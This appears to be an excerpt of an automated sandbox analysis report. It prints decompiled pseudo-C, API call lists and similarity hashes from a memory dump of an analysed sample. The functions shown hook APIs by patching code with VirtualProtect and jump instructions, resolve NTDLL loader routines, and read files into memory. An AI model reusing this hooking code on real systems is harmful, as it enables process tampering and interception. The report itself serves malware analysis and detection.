									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xb16de8 = 1;
										__eflags =  *0xb16de8;
										if( *0xb16de8 != 0) {
											goto L60;
										}
										_t84 =  *0xb16da0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xb16de8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xb16da0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xb16da8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xb16da4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xb16de8 = 1;
							__eflags =  *0xb16de8;
							if( *0xb16de8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xb16de8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xb16da8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xb16da0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xb16da8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xb16da8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00ab1277
0x00ab127a
0x00ab1280
0x00ab129e
0x00000000
0x00ab129e
0x00ab1288
0x00ab1291
0x00ab1297
0x00ab12a6
0x00ab12a9
0x00ab12ac
0x00ab12b6
0x00ab12b6
0x00ab12b8
0x00ab12bb
0x00ab12bd
0x00ab12bd
0x00ab12bf
0x00ab12c2
0x00000000
0x00000000
0x00ab12c4
0x00ab12c6
0x00ab132c
0x00ab132c
0x00ab148a
0x00000000
0x00ab148a
0x00ab12c8
0x00ab12c8
0x00ab12cc
0x00ab12ce
0x00ab12ce
0x00ab12ce
0x00ab12ce
0x00ab12d1
0x00ab12d2
0x00ab12d5
0x00ab12d5
0x00ab12d9
0x00ab12dd
0x00ab12eb
0x00ab12eb
0x00ab12f3
0x00ab12f9
0x00ab12fb
0x00ab12fd
0x00ab130d
0x00ab131a
0x00ab131e
0x00ab1323
0x00ab1325
0x00ab13a3
0x00ab13a3
0x00ab1327
0x00ab1327
0x00ab1327
0x00ab13a5
0x00ab13a7
0x00ab1488
0x00ab1488
0x00000000
0x00ab13ad
0x00ab13ad
0x00ab13b4
0x00000000
0x00000000
0x00ab13ba
0x00ab13be
0x00ab141a
0x00ab141c
0x00ab1424
0x00ab1426
0x00ab1428
0x00000000
0x00000000
0x00ab142a
0x00ab1430
0x00ab1432
0x00ab1434
0x00ab1449
0x00ab1449
0x00ab144b
0x00ab147a
0x00ab1481
0x00000000
0x00ab1481
0x00ab144f
0x00ab1450
0x00ab1452
0x00ab1454
0x00ab1454
0x00ab1456
0x00ab1458
0x00ab145a
0x00ab146e
0x00ab146e
0x00ab1471
0x00ab1473
0x00ab1473
0x00ab1474
0x00ab1474
0x00000000
0x00ab145c
0x00ab145c
0x00ab145c
0x00ab1465
0x00ab1466
0x00ab1468
0x00ab146a
0x00ab146a
0x00000000
0x00ab145c
0x00ab145a
0x00ab1436
0x00ab143d
0x00ab143d
0x00ab143f
0x00000000
0x00000000
0x00ab1441
0x00ab1442
0x00ab1445
0x00ab1447
0x00000000
0x00000000
0x00000000
0x00ab1447
0x00000000
0x00ab143d
0x00ab13c0
0x00ab13c3
0x00ab13c8
0x00000000
0x00000000
0x00ab13d1
0x00ab13d3
0x00ab13d9
0x00000000
0x00000000
0x00ab13df
0x00ab13e5
0x00000000
0x00000000
0x00ab13eb
0x00ab13ed
0x00ab13f6
0x00ab13fa
0x00000000
0x00000000
0x00ab1400
0x00ab1403
0x00ab1405
0x00000000
0x00000000
0x00ab140c
0x00ab140e
0x00000000
0x00000000
0x00ab1410
0x00ab1414
0x00000000
0x00000000
0x00000000
0x00ab1414
0x00000000
0x00000000
0x00000000
0x00ab12ff
0x00ab12ff
0x00ab12ff
0x00ab1306
0x00000000
0x00000000
0x00ab1308
0x00ab1309
0x00ab130b
0x00000000
0x00000000
0x00000000
0x00ab130b
0x00ab1333
0x00ab1335
0x00000000
0x00000000
0x00ab1345
0x00ab1347
0x00ab1349
0x00000000
0x00000000
0x00ab134f
0x00ab1356
0x00ab1382
0x00ab1382
0x00ab1384
0x00ab1386
0x00ab139a
0x00ab139c
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab1388
0x00ab1388
0x00ab1388
0x00ab1391
0x00ab1392
0x00ab1394
0x00ab1396
0x00ab1396
0x00000000
0x00ab1388
0x00ab1358
0x00ab1358
0x00ab135b
0x00ab135d
0x00ab136f
0x00ab136f
0x00ab1372
0x00ab1374
0x00ab1374
0x00ab1375
0x00ab1375
0x00ab137b
0x00ab137b
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab135f
0x00ab135f
0x00ab135f
0x00ab1366
0x00000000
0x00000000
0x00ab1368
0x00ab1368
0x00ab1369
0x00000000
0x00000000
0x00000000
0x00ab1369
0x00ab136b
0x00ab136d
0x00ab1380
0x00000000
0x00000000
0x00000000
0x00ab1380
0x00000000
0x00ab136d
0x00ab12df
0x00ab12e2
0x00ab12e5
0x00000000
0x00000000
0x00ab12e7
0x00ab12e9
0x00000000
0x00000000
0x00000000
0x00ab12e9
0x00ab12ae
0x00ab12b0
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00AB131E

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 5898f156342baf0ef7728da5c308f9ef8fc76572020d9f9092720e4db431aa33
Instruction ID: f77f2597bdd754fbc148f7b25b7a6180117400442e724dc81a9ec3e556dfae4c
Opcode Fuzzy Hash: 5898f156342baf0ef7728da5c308f9ef8fc76572020d9f9092720e4db431aa33
Instruction Fuzzy Hash: 4A61DE70B146029FDB69CF29D8A06E937EDEF85314BE88578D816CB692E730DC42C740

Uniqueness

Uniqueness Score: -1.00%

Function 00ACEA96, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Offset: 00AB6000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba96f6711df27de8cabc8e3fbf4f60924835705c72396694c496dac698528ab
Instruction ID: 9e9e5f1143de9250f5e13452191d430d532627a1ee20b707e43e2a8692606009
Opcode Fuzzy Hash: 6ba96f6711df27de8cabc8e3fbf4f60924835705c72396694c496dac698528ab
Instruction Fuzzy Hash: CD01D271900320AFE710CF999D89B9ABBA8FF04350F20812AFA05DB280DBB158818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3B9F, Relevance: 10.6, APIs: 7, Instructions: 120
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00AB3B9F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				void* _t48;
				long _t49;
				void* _t56;
				intOrPtr _t61;
				long _t70;
				void* _t74;
				void* _t83;
				void* _t84;
				intOrPtr _t87;
				intOrPtr* _t89;
				void* _t90;

				_push(0x1c);
				_push(0xab5488);
				E00AB1000(__ebx, __edi, __esi);
				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
				_t47 =  *((intOrPtr*)(_t90 + 8));
				_t87 =  *((intOrPtr*)(_t90 + 0xc));
				_t94 =  *(_t47 + 4) & 0x00000001;
				if(( *(_t47 + 4) & 0x00000001) == 0) {
					_t9 = _t47 + 8; // 0x2
					_t48 = E00AB414A(__ebx, __eflags, _t87,  *_t9);
				} else {
					_t8 = _t47 + 0xc; // 0xb1681c
					_t48 = E00AB41D0(_t94, _t87,  *_t8 & 0x0000ffff);
				}
				_t74 = _t48;
				if(_t74 == 0) {
					_t49 = 2;
					goto L12;
				} else {
					 *(_t90 - 0x24) =  *(_t90 - 0x24) & 0x00000000;
					if(VirtualProtect(_t74, 4, 0x40, _t90 - 0x24) == 0) {
						_t49 = GetLastError();
						goto L12;
					} else {
						_t89 =  *((intOrPtr*)(_t90 + 0x14));
						_t78 =  *((intOrPtr*)(_t90 + 8));
						 *((intOrPtr*)(_t89 + 0x18)) =  *((intOrPtr*)(_t90 + 8));
						 *((intOrPtr*)(_t89 + 8)) =  *_t74 + _t87;
						 *(_t89 + 0xc) = _t74;
						 *(_t89 + 0x10) =  *_t74;
						_t49 = E00AB3802( *((intOrPtr*)(_t90 + 8)), _t87,  *((intOrPtr*)(_t90 + 0x10)), _t89);
						 *(_t90 - 0x1c) = _t49;
						if(_t49 == 1) {
							_t21 = _t89 + 8; // 0x55c35d5e
							_t56 = E00AB3934(_t78, _t87,  *_t21);
							 *(_t90 - 0x28) = _t56;
							if(_t56 != 0 && VirtualProtect(_t56, 5, 0x40, _t90 - 0x20) != 0) {
								_t24 = _t89 + 0x14; // 0x2369f045
								_t83 =  *(_t90 - 0x28);
								 *((intOrPtr*)(_t83 + 1)) =  *_t24 - _t83 - 5;
								 *_t83 = 0xe9;
								 *(_t89 + 0x14) = _t83;
								 *( *((intOrPtr*)(_t90 + 8)) + 0x14) = _t83;
								_t84 = 0x20;
								_t70 =  !=  ? _t84 :  *(_t90 - 0x20);
								 *(_t90 - 0x20) = _t70;
								VirtualProtect(_t83, 5, _t70, _t90 - 0x20);
							}
							_t33 = _t89 + 0x14; // 0x2369f045
							 *_t74 =  *_t33 - _t87;
							VirtualProtect(_t74, 4,  *(_t90 - 0x24), _t90 - 0x24);
							 *(_t89 + 0x1c) =  *(_t89 + 0x1c) | 0x00000102;
							EnterCriticalSection(0xb16e20);
							_t61 =  *0xb16e38; // 0x0
							 *_t89 = _t61;
							 *((intOrPtr*)(_t89 + 4)) = 0xb16e38;
							 *((intOrPtr*)(_t61 + 4)) = _t89;
							 *0xb16e38 = _t89;
							LeaveCriticalSection(0xb16e20);
							_t40 = _t89 + 0x10; // 0xc7c03314
							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 8)) + 0x18)) =  *_t40 + _t87;
							_t49 = 0;
							L12:
							 *(_t90 - 0x1c) = _t49;
						}
					}
				}
				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
				return E00AB103B(_t49);
			}

0x00ab3b9f
0x00ab3ba1
0x00ab3ba6
0x00ab3bab
0x00ab3baf
0x00ab3bb2
0x00ab3bb5
0x00ab3bb9
0x00ab3bc8
0x00ab3bcc
0x00ab3bbb
0x00ab3bbb
0x00ab3bc1
0x00ab3bc1
0x00ab3bd2
0x00ab3bd7
0x00ab3ce7
0x00000000
0x00ab3bdd
0x00ab3bdd
0x00ab3bf2
0x00ab3cdd
0x00000000
0x00ab3bf8
0x00ab3bf8
0x00ab3bfb
0x00ab3bfe
0x00ab3c05
0x00ab3c08
0x00ab3c0d
0x00ab3c16
0x00ab3c1e
0x00ab3c24
0x00ab3c2a
0x00ab3c2e
0x00ab3c35
0x00ab3c3a
0x00ab3c4f
0x00ab3c52
0x00ab3c5a
0x00ab3c5d
0x00ab3c60
0x00ab3c66
0x00ab3c6e
0x00ab3c72
0x00ab3c75
0x00ab3c80
0x00ab3c80
0x00ab3c86
0x00ab3c8b
0x00ab3c97
0x00ab3c9d
0x00ab3caa
0x00ab3cb0
0x00ab3cb5
0x00ab3cb7
0x00ab3cbe
0x00ab3cc1
0x00ab3cc8
0x00ab3cce
0x00ab3cd6
0x00ab3cd9
0x00ab3cfe
0x00ab3cfe
0x00ab3cfe
0x00ab3c24
0x00ab3bf2
0x00ab3d01
0x00ab3d0a

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,00AB5488,0000001C,00AB3B7D,00B169A8,00000004,00B16948,00000004,00B169A0,00000002,00000000,?,00AB3F7B), ref: 00AB3BEA
VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00B16948,00000004,00B169A8), ref: 00AB3C45
VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00AB3C80
VirtualProtect.KERNEL32(00000000,00000004,?,?,00B16948,00000004,00B169A8), ref: 00AB3C97
EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3CAA
LeaveCriticalSection.KERNEL32(00B16E20), ref: 00AB3CC8
GetLastError.KERNEL32(?,00AB3F7B,00000002,00000000,00000001,00B1699C,?,00AB3EB1,00B16948,00AB1B07,00000000), ref: 00AB3CDD

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 2664878573-0
Opcode ID: e23293cee978327396bff5c2c36b1ec8f78df001771dee60e0089ed728b3d5d9
Instruction ID: b9731cd67f5cc9cfde6291e472bfc2e391378018a42d13d929e83a35e74247f7
Opcode Fuzzy Hash: e23293cee978327396bff5c2c36b1ec8f78df001771dee60e0089ed728b3d5d9
Instruction Fuzzy Hash: 60415DB2900704AFDB20DFB9DD49AAABBF8BF08310F144519F545EB292D770DA45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1DD0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00AB1DD0(void* __ecx, signed int __edx, void* _a4) {
				signed int _t2;
				signed int _t6;
				signed int _t8;
				signed int _t10;
				signed int _t13;
				signed int _t15;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t22;
				signed int _t25;
				void* _t27;

				_t25 = __edx;
				_t18 = __ecx;
				_t2 =  *0xb16d0c; // 0x0
				_t27 = 0;
				if((_t2 |  *0xb16d10) == 0) {
					L3:
					_t27 = 0x7f;
					_t26 = GetModuleHandleW(L"NTDLL.DLL");
					if(_t4 != 0) {
						_t6 = E00AB2DC0(_t17, _t18, _t26, "LdrLoadDll");
						asm("cdq");
						 *0xb16d0c = _t6;
						_pop(_t20);
						 *0xb16d10 = _t25;
						if((_t6 | _t25) != 0) {
							_t8 = E00AB2DC0(_t17, _t20, _t26, "LdrGetProcedureAddress");
							asm("cdq");
							 *0xb16d14 = _t8;
							_pop(_t22);
							 *0xb16d18 = _t25;
							if((_t8 | _t25) != 0) {
								_t10 = E00AB2DC0(_t17, _t22, _t26, "NtProtectVirtualMemory");
								asm("cdq");
								 *0xb16d1c = _t10;
								 *0xb16d20 = _t25;
								if((_t10 | _t25) != 0) {
									_t27 = 0;
									goto L8;
								}
							}
						}
					}
				} else {
					_t13 =  *0xb16d14; // 0x0
					if((_t13 |  *0xb16d18) == 0) {
						goto L3;
					} else {
						_t15 =  *0xb16d1c; // 0x0
						if((_t15 |  *0xb16d20) != 0) {
							L8:
							memcpy(_a4, 0xb16d0c, 0x18);
						} else {
							goto L3;
						}
					}
				}
				return _t27;
			}

0x00ab1dd0
0x00ab1dd0
0x00ab1dd3
0x00ab1dd9
0x00ab1de2
0x00ab1dfe
0x00ab1e00
0x00ab1e0c
0x00ab1e10
0x00ab1e18
0x00ab1e1d
0x00ab1e1f
0x00ab1e26
0x00ab1e27
0x00ab1e2d
0x00ab1e35
0x00ab1e3a
0x00ab1e3c
0x00ab1e43
0x00ab1e44
0x00ab1e4a
0x00ab1e52
0x00ab1e57
0x00ab1e59
0x00ab1e61
0x00ab1e67
0x00ab1e69
0x00000000
0x00ab1e69
0x00ab1e67
0x00ab1e4a
0x00ab1e2d
0x00ab1de4
0x00ab1de4
0x00ab1def
0x00000000
0x00ab1df1
0x00ab1df1
0x00ab1dfc
0x00ab1e6b
0x00ab1e75
0x00000000
0x00000000
0x00000000
0x00ab1dfc
0x00ab1def
0x00ab1e82

APIs

GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000000,?,00AB1C8A,00000000), ref: 00AB1E06
memcpy.NTDLL(00AB1C8A,00B16D0C,00000018,?,00AB1C8A,00000000), ref: 00AB1E75

Strings

NtProtectVirtualMemory, xrefs: 00AB1E4C
LdrGetProcedureAddress, xrefs: 00AB1E2F
LdrLoadDll, xrefs: 00AB1E12
NTDLL.DLL, xrefs: 00AB1E01

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulememcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NtProtectVirtualMemory
API String ID: 1801490239-862099514
Opcode ID: faf9136bf6e539c7dbdda90503cb1013d67d21405897c1b47f6482d5d375ea74
Instruction ID: 472179f79f190cf511a61eb2ac79fc1998607231d29ded373fdc29cff1ec6dd5
Opcode Fuzzy Hash: faf9136bf6e539c7dbdda90503cb1013d67d21405897c1b47f6482d5d375ea74
Instruction Fuzzy Hash: 63116576B44604AAD315BB6CBC42AE67BEDB7847103A4C93BF404D71A3DEB1990087B4

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3D0B, Relevance: 9.1, APIs: 6, Instructions: 119
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00AB3D0B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t53;
				long _t54;
				void _t56;
				void _t67;
				void** _t68;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t77;
				void* _t79;
				long _t81;
				void* _t82;
				intOrPtr _t84;
				void* _t85;

				_push(0x1c);
				_push(0xab5478);
				E00AB1000(__ebx, __edi, __esi);
				 *(_t85 - 0x20) =  *(_t85 - 0x20) & 0x00000000;
				 *(_t85 - 0x1c) =  *(_t85 - 0x1c) & 0x00000000;
				_t75 = 0;
				_t77 =  *0xb16d94; // 0x0
				if(_t77 == 0) {
					L4:
					_t74 =  *((intOrPtr*)(_t85 + 8));
					if(( *(_t74 + 4) & 0x00000001) == 0) {
						_t14 = _t74 + 8; // 0x2
						 *(_t85 - 0x20) =  *_t14;
					} else {
						_t12 = _t74 + 0xc; // 0xb1681c
						 *(_t85 - 0x1c) =  *_t12 & 0x0000ffff;
					}
					_t53 = E00AB38C4(_t85 - 0x28);
					_pop(_t76);
					_t81 = _t53;
					if(_t81 != 0) {
						L24:
						_t54 = _t81;
						L25:
						return E00AB103B(_t54);
					} else {
						_t17 = _t74 + 0x14; // 0x2
						_t56 =  *_t17;
						_t79 =  *(_t85 - 0x28);
						if(_t56 == 0) {
							_t19 = _t74 + 0x10; // 0x0
							_t56 =  *_t19;
						}
						 *(_t79 + 0x14) = _t56;
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t82 = E00AB4215(_t76,  *((intOrPtr*)(_t85 + 0xc)),  *_t74,  *(_t85 - 0x20),  *(_t85 - 0x1c), E00AB3995);
						if(_t82 != 0) {
							L13:
							 *(_t85 - 0x20) =  *(_t85 - 0x20) & 0x00000000;
							if(VirtualProtect(_t82, 4, 0x40, _t85 - 0x20) == 0) {
								_t81 = GetLastError();
								goto L20;
							}
							 *((intOrPtr*)(_t79 + 0x18)) = _t74;
							if( *(_t74 + 0x18) == 0) {
								 *(_t74 + 0x18) =  *_t82;
							}
							 *(_t79 + 8) =  *_t82;
							 *(_t79 + 0xc) = _t82;
							 *(_t79 + 0x10) =  *_t82;
							 *_t82 =  *(_t79 + 0x14);
							VirtualProtect(_t82, 4,  *(_t85 - 0x20), _t85 - 0x20);
							 *(_t79 + 0x1c) =  *(_t79 + 0x1c) | 0x00000101;
							EnterCriticalSection(0xb16e20);
							_t67 =  *0xb16e38; // 0x0
							 *_t79 = _t67;
							 *(_t79 + 4) = 0xb16e38;
							 *(_t67 + 4) = _t79;
							 *0xb16e38 = _t79;
							LeaveCriticalSection(0xb16e20);
							_t81 = 0;
							 *((intOrPtr*)(_t85 - 0x24)) = 0;
							_t68 =  *(_t85 + 0x10);
							if(_t68 != 0) {
								 *_t68 = _t79;
							}
							goto L21;
						} else {
							_t82 = E00AB40C4(_t76,  *((intOrPtr*)(_t85 + 0xc)),  *_t74,  *(_t85 - 0x20),  *(_t85 - 0x1c));
							if(_t82 == 0) {
								_t81 = 2;
								L20:
								 *((intOrPtr*)(_t85 - 0x24)) = _t81;
								L21:
								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
								if(_t81 != 0) {
									LocalFree(_t79);
								}
								goto L24;
							}
							goto L13;
						}
					}
				}
				_t84 =  *0xb16d90; // 0x0
				while( *((intOrPtr*)(_t85 + 0xc)) !=  *((intOrPtr*)(_t84 + _t75 * 4))) {
					_t75 = _t75 + 1;
					if(_t75 < _t77) {
						continue;
					}
					goto L4;
				}
				_t54 = 0;
				goto L25;
			}

0x00ab3d0b
0x00ab3d0d
0x00ab3d12
0x00ab3d17
0x00ab3d1b
0x00ab3d1f
0x00ab3d21
0x00ab3d29
0x00ab3d3e
0x00ab3d3e
0x00ab3d45
0x00ab3d57
0x00ab3d5a
0x00ab3d47
0x00ab3d47
0x00ab3d4b
0x00ab3d4b
0x00ab3d61
0x00ab3d66
0x00ab3d67
0x00ab3d6b
0x00ab3e86
0x00ab3e86
0x00ab3e88
0x00ab3e8d
0x00ab3d71
0x00ab3d71
0x00ab3d71
0x00ab3d74
0x00ab3d79
0x00ab3d7b
0x00ab3d7b
0x00ab3d7b
0x00ab3d7e
0x00ab3d81
0x00ab3d9d
0x00ab3da1
0x00ab3dc0
0x00ab3dc0
0x00ab3dd5
0x00ab3e4e
0x00000000
0x00ab3e4e
0x00ab3dd7
0x00ab3dde
0x00ab3de2
0x00ab3de2
0x00ab3de7
0x00ab3dea
0x00ab3def
0x00ab3df5
0x00ab3e01
0x00ab3e07
0x00ab3e14
0x00ab3e1a
0x00ab3e1f
0x00ab3e21
0x00ab3e28
0x00ab3e2b
0x00ab3e32
0x00ab3e38
0x00ab3e3a
0x00ab3e3d
0x00ab3e42
0x00ab3e44
0x00ab3e44
0x00000000
0x00ab3da3
0x00ab3db6
0x00ab3dba
0x00ab3e54
0x00ab3e55
0x00ab3e55
0x00ab3e58
0x00ab3e58
0x00ab3e7e
0x00ab3e81
0x00ab3e81
0x00000000
0x00ab3e7e
0x00000000
0x00ab3dba
0x00ab3da1
0x00ab3d6b
0x00ab3d2b
0x00ab3d31
0x00ab3d39
0x00ab3d3c
0x00000000
0x00000000
0x00000000
0x00ab3d3c
0x00ab3d50
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000), ref: 00AB3DCD
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000), ref: 00AB3E01
EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3E14
LeaveCriticalSection.KERNEL32(00B16E20), ref: 00AB3E32
GetLastError.KERNEL32 ref: 00AB3E48
LocalFree.KERNEL32(00000000), ref: 00AB3E81

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorFreeLastLeaveLocal
String ID:
API String ID: 567920170-0
Opcode ID: 4a0d8b3a9021b6d5cf79d72b4b42849714d4873a68aef56e8061682b87462f65
Instruction ID: 5acb3fa1f696e83b29003223eb7b91941793dc2004ce8b96167b27f70405fdc8
Opcode Fuzzy Hash: 4a0d8b3a9021b6d5cf79d72b4b42849714d4873a68aef56e8061682b87462f65
Instruction Fuzzy Hash: D7416972D00625AFCF219F64C844BEEBBF8BF08710F558659E904AB252D774EA40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB307D, Relevance: 9.1, APIs: 6, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB307D(void* __ecx, CHAR* _a4, void** _a8, long* _a12) {
				long _v8;
				long _v12;
				long _t15;
				long _t23;
				long _t26;
				void* _t28;
				void* _t31;

				_t23 = 0;
				_t31 = 0;
				_t28 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t28 == 0xffffffff) {
					L8:
					_t23 = GetLastError();
					L9:
					if(_t28 != 0xffffffff) {
						CloseHandle(_t28);
					}
					if(_t31 != 0 && _t23 != 0) {
						LocalFree(_t31);
					}
					return _t23;
				}
				_t15 = GetFileSize(_t28, 0);
				_v8 = _t15;
				if(_t15 != 0) {
					_t31 = E00AB1490(_t15 + 1);
					if(_t31 == 0 || ReadFile(_t28, _t31, _v8,  &_v12, 0) == 0) {
						goto L8;
					} else {
